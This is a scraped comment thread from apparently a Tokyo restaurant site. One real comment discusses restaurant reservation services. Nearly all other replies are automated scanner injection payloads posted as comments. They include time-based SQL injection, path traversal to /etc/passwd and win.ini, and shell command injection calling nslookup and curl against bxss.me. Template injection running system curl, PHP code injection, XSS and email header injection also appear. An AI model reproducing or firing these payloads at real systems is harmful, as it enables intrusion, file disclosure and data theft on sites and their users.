1'"

1727141873

re: thetokyogourmet

@@Adde2

1727141875

re: thetokyogourmet

1

1727383035

re: thetokyogourmet

1

1727383036

re: thetokyogourmet

1

1727383036

re: thetokyogourmet

1

1727383588

re: thetokyogourmet

1

1727383589

re: thetokyogourmet

1

1727383589

re: thetokyogourmet

1BAG7SR2520

1753894583

re: thetokyogourmet

response.write(9284055*9452567)

1753894587

re: thetokyogourmet

'+response.write(9284055*9452567)+'

1753894589

re: thetokyogourmet

"+response.write(9284055*9452567)+"

1753894590

re: thetokyogourmet


<esi:include src="http://bxss.me/rpb.png"/>

1753894595

re: thetokyogourmet

${10000293+9999741}

1753894596

re: thetokyogourmet

../../../../../../../../../../../../../../etc/passwd

1753894597

re: thetokyogourmet

../../../../../../../../../../../../../../windows/win.ini

1753894598

re: thetokyogourmet

file:///etc/passwd

1753894599

re: thetokyogourmet

redirtest.acx

1753894600

re: thetokyogourmet

)

1753894601

re: thetokyogourmet

../

1753894601

re: thetokyogourmet

!(()&&!|*|*|

1753894603

re: thetokyogourmet

^(#$!@#$)(()))******

1753894604

re: thetokyogourmet

ctime
sleep
p0
(I30
tp1
Rp2
.

1753894606

re: thetokyogourmet

'.gethostbyname(lc('hitzd'.'slzrrfasd3b8c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(82).chr(106).chr(84).'

1753894610

re: thetokyogourmet

".gethostbyname(lc("hitov"."oevxnpzoc6cec.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(89).chr(102).chr(83)."

1753894612

re: thetokyogourmet

gethostbyname(lc('hitti'.'flnwkphi6e76d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(72).chr(111).chr(72)

1753894613

1753894614

re: thetokyogourmet

1753894614

re: thetokyogourmet

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

1753894615

re: thetokyogourmet

bxss.me/t/xss.html?%00

1753894615

re: thetokyogourmet

/etc/shells

1753894616

re: thetokyogourmet

../../../../../../../../../../../../../../etc/shells

1753894618

re: thetokyogourmet

c:/windows/win.ini

1753894619

re: thetokyogourmet

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1753894619

re: thetokyogourmet

"+"A".concat(70-3).concat(22*4).concat(115).concat(73).concat(108).concat(77)+(require"socket"
Socket.gethostbyname("hitma"+"nxhzmzvbb2d7f.bxss.me.")[3].to_s)+"

1753894619

re: thetokyogourmet

replies

1753894619

re: thetokyogourmet

echo xcwrhz$()\ mpcbcq\nz^xyu||a #' &echo xcwrhz$()\ mpcbcq\nz^xyu||a #|" &echo xcwrhz$()\ mpcbcq\nz^xyu||a #

1753894620

re: thetokyogourmet

bxss.me

1753894620

re: thetokyogourmet

';print(md5(31337));$a='

1753894620

re: thetokyogourmet

'+'A'.concat(70-3).concat(22*4).concat(106).concat(84).concat(112).concat(65)+(require'socket'
Socket.gethostbyname('hitnt'+'vggsmjtjef279.bxss.me.')[3].to_s)+'

1753894621

re: thetokyogourmet

replies

1753894621

re: thetokyogourmet

'"

1753894621

re: thetokyogourmet

&echo kpcfvm$()\ bccshy\nz^xyu||a #' &echo kpcfvm$()\ bccshy\nz^xyu||a #|" &echo kpcfvm$()\ bccshy\nz^xyu||a #

1753894621

re: thetokyogourmet

1753894621

re: thetokyogourmet

";print(md5(31337));$a="

1753894621

re: thetokyogourmet

'A'.concat(70-3).concat(22*4).concat(98).concat(76).concat(109).concat(85)+(require'socket'
Socket.gethostbyname('hitqx'+'sgllgcpi324b9.bxss.me.')[3].to_s)

1753894622

re: thetokyogourmet

replies/.

1753894622

re: thetokyogourmet

<!--

1753894622

re: thetokyogourmet

|echo eesqfh$()\ yqtmsd\nz^xyu||a #' |echo eesqfh$()\ yqtmsd\nz^xyu||a #|" |echo eesqfh$()\ yqtmsd\nz^xyu||a #

1753894622

re: thetokyogourmet

1753894622

re: thetokyogourmet

${@print(md5(31337))}

1753894622

re: thetokyogourmet

expr 9000549725 - 934730

1753894623

re: thetokyogourmet

${@print(md5(31337))}\

1753894624

re: thetokyogourmet

'"()

1753894624

re: thetokyogourmet

(nslookup -q=cname hitjgarjsoeko8b801.bxss.me||curl hitjgarjsoeko8b801.bxss.me))

1753894624

re: thetokyogourmet

'.print(md5(31337)).'

1753894625

re: thetokyogourmet


'&&sleep(27*1000)*eizkpi&&'

1753894625

re: thetokyogourmet

$(nslookup -q=cname hitwfmqorstsrbf38f.bxss.me||curl hitwfmqorstsrbf38f.bxss.me)

1753894626

re: thetokyogourmet


"&&sleep(27*1000)*ngvggz&&"

1753894626

re: thetokyogourmet

&nslookup -q=cname hitpliqmzetsd51093.bxss.me&'\"`0&nslookup -q=cname hitpliqmzetsd51093.bxss.me&`'

1753894627

re: thetokyogourmet


'||sleep(27*1000)*cgydcq||'

1753894628

re: thetokyogourmet


'"()&%<zzz><ScRiPt >xcSh(9292)</ScRiPt>

1753894628

re: thetokyogourmet

&(nslookup -q=cname hitiuciqistciec0fb.bxss.me||curl hitiuciqistciec0fb.bxss.me)&'\"`0&(nslookup -q=cname hitiuciqistciec0fb.bxss.me||curl hitiuciqistciec0fb.bxss.me)&`'

1753894628

re: thetokyogourmet


"||sleep(27*1000)*zkbpdg||"

1753894629

re: thetokyogourmet

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitjpieatrnbpcdf23.bxss.me")}}

1753894629

re: thetokyogourmet

|(nslookup -q=cname hitdipckbfnkc09de1.bxss.me||curl hitdipckbfnkc09de1.bxss.me)

1753894630

re: thetokyogourmet

'"()&%<zzz><ScRiPt >xcSh(9139)</ScRiPt>

1753894630

re: thetokyogourmet

`(nslookup -q=cname hitdokbmowozhc9dad.bxss.me||curl hitdokbmowozhc9dad.bxss.me)`

1753894631

re: thetokyogourmet


9572262

1753894632

re: thetokyogourmet

;(nslookup -q=cname hitlownnzmlbl5dd1b.bxss.me||curl hitlownnzmlbl5dd1b.bxss.me)|(nslookup -q=cname hitlownnzmlbl5dd1b.bxss.me||curl hitlownnzmlbl5dd1b.bxss.me)&(nslookup -q=cname hitlownnzmlbl5dd1b.bxss.me||curl hitlownnzmlbl5dd1b.bxss.me)

1753894632

re: thetokyogourmet

|(nslookup${IFS}-q${IFS}cname${IFS}hitaobaqapfpd39ec3.bxss.me||curl${IFS}hitaobaqapfpd39ec3.bxss.me)

1753894633

re: thetokyogourmet

&(nslookup${IFS}-q${IFS}cname${IFS}hitqhgqiodeoaa4116.bxss.me||curl${IFS}hitqhgqiodeoaa4116.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitqhgqiodeoaa4116.bxss.me||curl${IFS}hitqhgqiodeoaa4116.bxss.me)&`'

1753894634

re: thetokyogourmet


eom5vdiH

1753894829

re: thetokyogourmet


*1

1753894836

re: thetokyogourmet


*1

1753894837

re: thetokyogourmet


*1

1753894838

re: thetokyogourmet


*1

1753894839

re: thetokyogourmet

-1 OR 5*5=25 --

1753894839

re: thetokyogourmet

-1 OR 5*5=26 --

1753894840

re: thetokyogourmet

-1 OR 5*5=25

1753894841

re: thetokyogourmet

-1 OR 5*5=26

1753894842

re: thetokyogourmet


*if(now()=sysdate(),sleep(15),0)

1753894847

re: thetokyogourmet


0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z

1753894854

re: thetokyogourmet


0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z

1753894859

re: thetokyogourmet

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1753894864

re: thetokyogourmet


-1; waitfor delay '0:0:15' --

1753894869

re: thetokyogourmet


-1); waitfor delay '0:0:15' --

1753894874

re: thetokyogourmet


-1 waitfor delay '0:0:15' --

1753894879

re: thetokyogourmet


BJJ2OkZ2'; waitfor delay '0:0:15' --

1753894886

re: thetokyogourmet


-1 OR 212=(SELECT 212 FROM PG_SLEEP(15))--

1753894893

re: thetokyogourmet


-1) OR 300=(SELECT 300 FROM PG_SLEEP(15))--

1753894898

re: thetokyogourmet


-1)) OR 454=(SELECT 454 FROM PG_SLEEP(15))--

1753894903

re: thetokyogourmet


Q74kIgCZ' OR 612=(SELECT 612 FROM PG_SLEEP(15))--

1753894910

re: thetokyogourmet


dYyRVG7C') OR 284=(SELECT 284 FROM PG_SLEEP(15))--

1753894915

re: thetokyogourmet


Hsc5K2wX')) OR 296=(SELECT 296 FROM PG_SLEEP(15))--

1753894919

re: thetokyogourmet


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1753894924

re: thetokyogourmet


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1753894932

re: thetokyogourmet

'||(select 1 from (select pg_sleep(15))x)||'

1753894937

re: thetokyogourmet

''||(select 1 from (select pg_sleep(15))x)||''

1753894942

re: thetokyogourmet


'"

1753894944

re: thetokyogourmet

@@YM1ya

1753894946

re: thetokyogourmet

(select 198766*667891)

1753894947

re: thetokyogourmet

(select 198766*667891 from DUAL)

1753894948

It just seems like services like Autoreserve, Percotter, etc. have an increasingly limited use case. In recent years, many new joints (frequently run by younger chefs) have started taking reservations online on Tablecheck, Toreta, or even just IG. So companies like Autoreserve aren't needed for those. At the high-end, many well-reviewed restaurants have either partnered with Omakase, Tableall, or require phone-camping at specific times to get seats, so again, a service that calls once every 40mins isn't useful there.

So what we're left with is the awkward middle-ground of restaurants that are under the radar, and run by old-school chefs who don't do online reservations. And only if you're staying at a hotel without a concierge (otherwise your concierge can easily book, since it's under the radar).

1680705955 Reply
Add photos

re: JJ

xnWJbLTX

1697002567

re: JJ

1*

1697002567

re: JJ

1*

1697002568

re: JJ

1*

1697002568

re: JJ

1*

1697002568

re: JJ

-1 OR 2+868-868-1=0+0+0+1

1697002568

re: JJ

-1 OR 3+868-868-1=0+0+0+1

1697002568

re: JJ

if(now()=sysdate(),sleep(15),0)

1697002573

re: JJ

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002577

re: JJ

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002581

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002586

re: JJ

-1; waitfor delay '0:0:15' --

1697002590

re: JJ

-1); waitfor delay '0:0:15' --

1697002595

re: JJ

1 waitfor delay '0:0:15' --

1697002600

re: JJ

uDjhMGWB'; waitfor delay '0:0:15' --

1697002603

re: JJ

-5 OR 859=(SELECT 859 FROM PG_SLEEP(15))--

1697002607

re: JJ

bu4z3qok

1697002608

re: JJ

1*

1697002608

re: JJ

1*

1697002608

re: JJ

1*

1697002608

re: JJ

1*

1697002609

re: JJ

-1 OR 2+877-877-1=0+0+0+1

1697002609

re: JJ

-1 OR 3+877-877-1=0+0+0+1

1697002610

re: JJ

-5) OR 143=(SELECT 143 FROM PG_SLEEP(15))--

1697002614

re: JJ

if(now()=sysdate(),sleep(15),0)

1697002615

re: JJ

-1)) OR 621=(SELECT 621 FROM PG_SLEEP(15))--

1697002618

re: JJ

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002619

re: JJ

HijFZjsJ' OR 119=(SELECT 119 FROM PG_SLEEP(15))--

1697002622

re: JJ

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002623

re: JJ

NHbOJtpx') OR 932=(SELECT 932 FROM PG_SLEEP(15))--

1697002626

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002627

re: JJ

kvoGbcIn')) OR 954=(SELECT 954 FROM PG_SLEEP(15))--

1697002630

re: JJ

-1; waitfor delay '0:0:15' --

1697002632

re: JJ


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002636

re: JJ

-1); waitfor delay '0:0:15' --

1697002637

re: JJ


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002640

re: JJ

1 waitfor delay '0:0:15' --

1697002641

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1697002645

re: JJ

1GQCSHak'; waitfor delay '0:0:15' --

1697002646

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1697002649

re: JJ

1'"

1697002649

re: JJ

@@NfLxw

1697002650

re: JJ

-5 OR 739=(SELECT 739 FROM PG_SLEEP(15))--

1697002650

re: JJ

-5) OR 883=(SELECT 883 FROM PG_SLEEP(15))--

1697002654

re: JJ

-1)) OR 760=(SELECT 760 FROM PG_SLEEP(15))--

1697002662

re: JJ

Nca27hmV' OR 336=(SELECT 336 FROM PG_SLEEP(15))--

1697002666

re: JJ

fwdA8O3U') OR 990=(SELECT 990 FROM PG_SLEEP(15))--

1697002670

re: JJ

qKOtGXg7')) OR 648=(SELECT 648 FROM PG_SLEEP(15))--

1697002673

re: JJ


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002678

re: JJ


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002682

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1697002686

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1697002690

re: JJ

1'"

1697002690

re: JJ

@@CjL6j

1697002691

re: JJ

1tLKQqKGO

1727141139

re: JJ

%0abcc:074625.67-13751.67.24afe.19990.2@bxss.me

1727141144

re: JJ

response.write(9510767*9054170)

1727141144

re: JJ

to@example.com>%0d%0abcc:074625.67-13752.67.24afe.19990.2@bxss.me

1727141144

re: JJ

'+response.write(9510767*9054170)+'

1727141145

re: JJ

"+response.write(9510767*9054170)+"

1727141146

re: JJ

<esi:include src="http://bxss.me/rpb.png"/>

1727141147

re: JJ

../../../../../../../../../../../../../../etc/passwd

1727141147

re: JJ

${9999878+9999998}

1727141148

re: JJ

../../../../../../../../../../../../../../windows/win.ini

1727141148

re: JJ

file:///etc/passwd

1727141149

re: JJ

../../../../../../../../../../../../../../../proc/version

1727141151

re: JJ

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727141151

re: JJ

../../../../../../../../../../etc/passwd%00.jpg

1727141152

re: JJ

'.gethostbyname(lc('hitoc'.'pfoagydpdd2d7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(65).chr(110).chr(89).'

1727141153

re: JJ

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727141153

re: JJ

)

1727141153

re: JJ

".gethostbyname(lc("hiter"."aqqnwwyy4860d.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(70).chr(102).chr(65)."

1727141154

re: JJ

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727141154

re: JJ

!(()&&!|*|*|

1727141154

re: JJ

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727141155

re: JJ

^(#$!@#$)(()))******

1727141155

re: JJ

/etc/passwd

1727141155

re: JJ

echo ogintl$()\ wtoepq\nz^xyu||a #' &echo ogintl$()\ wtoepq\nz^xyu||a #|" &echo ogintl$()\ wtoepq\nz^xyu||a #

1727141156

re: JJ

%2fetc%2fpasswd

1727141156

re: JJ

&echo rhoucj$()\ hrzlpa\nz^xyu||a #' &echo rhoucj$()\ hrzlpa\nz^xyu||a #|" &echo rhoucj$()\ hrzlpa\nz^xyu||a #

1727141157

re: JJ

/.././.././.././.././.././.././.././../etc/./passwd%00

1727141157

re: JJ

|echo sjjuqt$()\ mnxeuz\nz^xyu||a #' |echo sjjuqt$()\ mnxeuz\nz^xyu||a #|" |echo sjjuqt$()\ mnxeuz\nz^xyu||a #

1727141158

re: JJ

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727141158

re: JJ

(nslookup hitizinnlrcrbd22ef.bxss.me||perl -e "gethostbyname('hitizinnlrcrbd22ef.bxss.me')")

1727141159

re: JJ

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727141159

re: JJ

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727141159

1727141160

re: JJ

$(nslookup hitdpwelsufuwf72a1.bxss.me||perl -e "gethostbyname('hitdpwelsufuwf72a1.bxss.me')")

1727141160

re: JJ

"+"A".concat(70-3).concat(22*4).concat(122).concat(70).concat(102).concat(88)+(require"socket"
Socket.gethostbyname("hitmg"+"asithino5d6f5.bxss.me.")[3].to_s)+"

1727141160

re: JJ

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727141160

re: JJ

bxss.me/t/xss.html?%00

1727141160

re: JJ

&nslookup hitppzhhgzshcdb408.bxss.me&'\"`0&nslookup hitppzhhgzshcdb408.bxss.me&`'

1727141161

re: JJ

'+'A'.concat(70-3).concat(22*4).concat(118).concat(65).concat(122).concat(89)+(require'socket'
Socket.gethostbyname('hitmc'+'cuqcmskz5f4e9.bxss.me.')[3].to_s)+'

1727141161

re: JJ

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727141161

re: JJ

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727141161

re: JJ

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727141162

re: JJ

&(nslookup hitdnmuyuetjw9323b.bxss.me||perl -e "gethostbyname('hitdnmuyuetjw9323b.bxss.me')")&'\"`0&(nslookup hitdnmuyuetjw9323b.bxss.me||perl -e "gethostbyname('hitdnmuyuetjw9323b.bxss.me')")&`'

1727141162

re: JJ

';print(md5(31337));$a='

1727141162

re: JJ

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727141162

1727141163

re: JJ

|(nslookup hitjiwpthmyed69410.bxss.me||perl -e "gethostbyname('hitjiwpthmyed69410.bxss.me')")

1727141163

re: JJ

";print(md5(31337));$a="

1727141163

re: JJ

file:///etc/passwd

1727141163

re: JJ

'"

1727141163

1727141164

re: JJ

`(nslookup hitojhbwibnleecd98.bxss.me||perl -e "gethostbyname('hitojhbwibnleecd98.bxss.me')")`

1727141164

re: JJ

${@print(md5(31337))}

1727141164

re: JJ

/\../\../\../\../\../\../\../etc/passwd

1727141164

re: JJ

<!--

1727141164

re: JJ

/etc/shells

1727141165

re: JJ

;(nslookup hitxskbqnluxtbff6b.bxss.me||perl -e "gethostbyname('hitxskbqnluxtbff6b.bxss.me')")|(nslookup hitxskbqnluxtbff6b.bxss.me||perl -e "gethostbyname('hitxskbqnluxtbff6b.bxss.me')")&(nslookup hitxskbqnluxtbff6b.bxss.me||perl -e "gethostbyname('hitxskbqnluxtbff6b.bxss.me')")

1727141165

re: JJ

${@print(md5(31337))}\

1727141165

re: JJ

/WEB-INF/web.xml

1727141165

re: JJ

c:/windows/win.ini

1727141166

re: JJ

'.print(md5(31337)).'

1727141166

re: JJ

C:\WINDOWS\system32\drivers\etc\hosts

1727141166

re: JJ

bxss.me

1727141166

re: JJ

../../../../../../../../../../windows/win.ini%00.jpg

1727141167

re: JJ

/../../../../../../../../../../boot.ini

1727141168

re: JJ

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727141168

re: JJ

..\..\..\..\..\..\..\..\windows\win.ini

1727141169

re: JJ

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727141170

re: JJ

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727141171

re: JJ

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727141172

re: JJ

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727141172

re: JJ

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.